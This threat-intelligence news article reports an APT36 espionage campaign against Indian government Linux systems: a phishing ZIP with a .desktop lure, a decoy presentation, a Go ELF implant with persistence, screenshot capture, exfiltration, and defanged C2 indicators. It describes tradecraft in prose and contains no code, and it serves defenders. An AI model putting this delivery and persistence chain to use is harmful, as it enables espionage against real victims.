APT36 Unleashes Linux Malware: Transparent Tribe Targets Indian Government with Go-Based Espionage Tools
Ddos 
A newly uncovered campaign by Pakistani threat actor APT36, also known as Transparent Tribe, reveals a significant evolution in their cyber-espionage playbook—this time, taking aim squarely at Linux-based systems. According to a recent report from cybersecurity firm CYFIRMA, the group has shifted its focus toward exploiting BOSS Linux, a distribution widely deployed across Indian government agencies.
“The deployment of Linux-specific malware signifies a noteworthy advancement in APT36’s operational capabilities and highlights the increasing risk posed to critical government and defense infrastructure,” the report warns.
The operation begins with a phishing email masquerading as a cybersecurity advisory. The attached ZIP archive, named Cyber-Security-Advisory.zip, contains a .desktop file designed to look like a harmless shortcut. But this file is anything but benign.
Upon execution, the .desktop file pulls a clever sleight-of-hand: it opens a PowerPoint decoy (slide.pptx) using LibreOffice Impress to maintain the illusion of legitimacy, while silently fetching and launching a malicious ELF binary (BOSS.elf) in the background.
“This carefully orchestrated sequence enables the attacker to deploy and execute malware without alerting the victim,” CYFIRMA states, noting the dual-action strategy as both deceptive and highly effective.
The malicious ELF binary—written in Go and dropped locally as client.elf—executes using nohup, ensuring persistence even if the user logs out. All signs of the execution are suppressed via output redirection to /dev/null.
Once active, the malware embarks on several key functions:
- Reconnaissance: Gathers system hostname, CPU, RAM specs, runlevel, and startup scripts.
- Persistence & Evasion: Uses main.junkcalc2 for stealthy logging while avoiding antivirus detection.
- Data Discovery & Exfiltration: Employs os.readDir to search file systems and main.sendResponse for uploading stolen data.
- Visual Surveillance: Uses the Go library github.com/kbinani/screenshot to capture images of the user’s desktop.
The malware connects to a known C2 server at 101.99.92[.]182:12520, maintaining communication with keep-alive mechanisms that retry every 30 seconds—indicating a strong intent to preserve access for long-term espionage.
The campaign also leverages the domain sorlastore.com, a known APT36 asset. This infrastructure has been used in parallel attacks targeting Windows environments through PPAM (PowerPoint Add-in) files embedded with malicious macros.
“These campaigns reflect tactics like those observed in Linux-based attacks, utilizing phishing emails that deliver PPAM files crafted to resemble legitimate cybersecurity or defense-related advisories,” CYFIRMA notes.
This latest APT36 campaign marks a stark warning for the cybersecurity posture of organizations relying on Linux systems, particularly within sensitive government or defense roles.
“Organizations, particularly those operating within the public sector and utilizing Linux-based systems, are strongly advised to treat this threat as a matter of high priority,” the report concludes.
Related Posts:
- APT36 Suspected in India Gov Spoofing Phishing with ClickFix Tactics
- Transparent Tribe APT Group’s New Arsenal: Mythic Poseidon, Linux, and C2 Takedown
- Transparent Tribe Targets Indian Government and Defense Sectors with Evolving Cyber Espionage Tactics
- From SideCopy to Transparent Tribe: Pakistan APTs Hit Indian Government With RATs
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
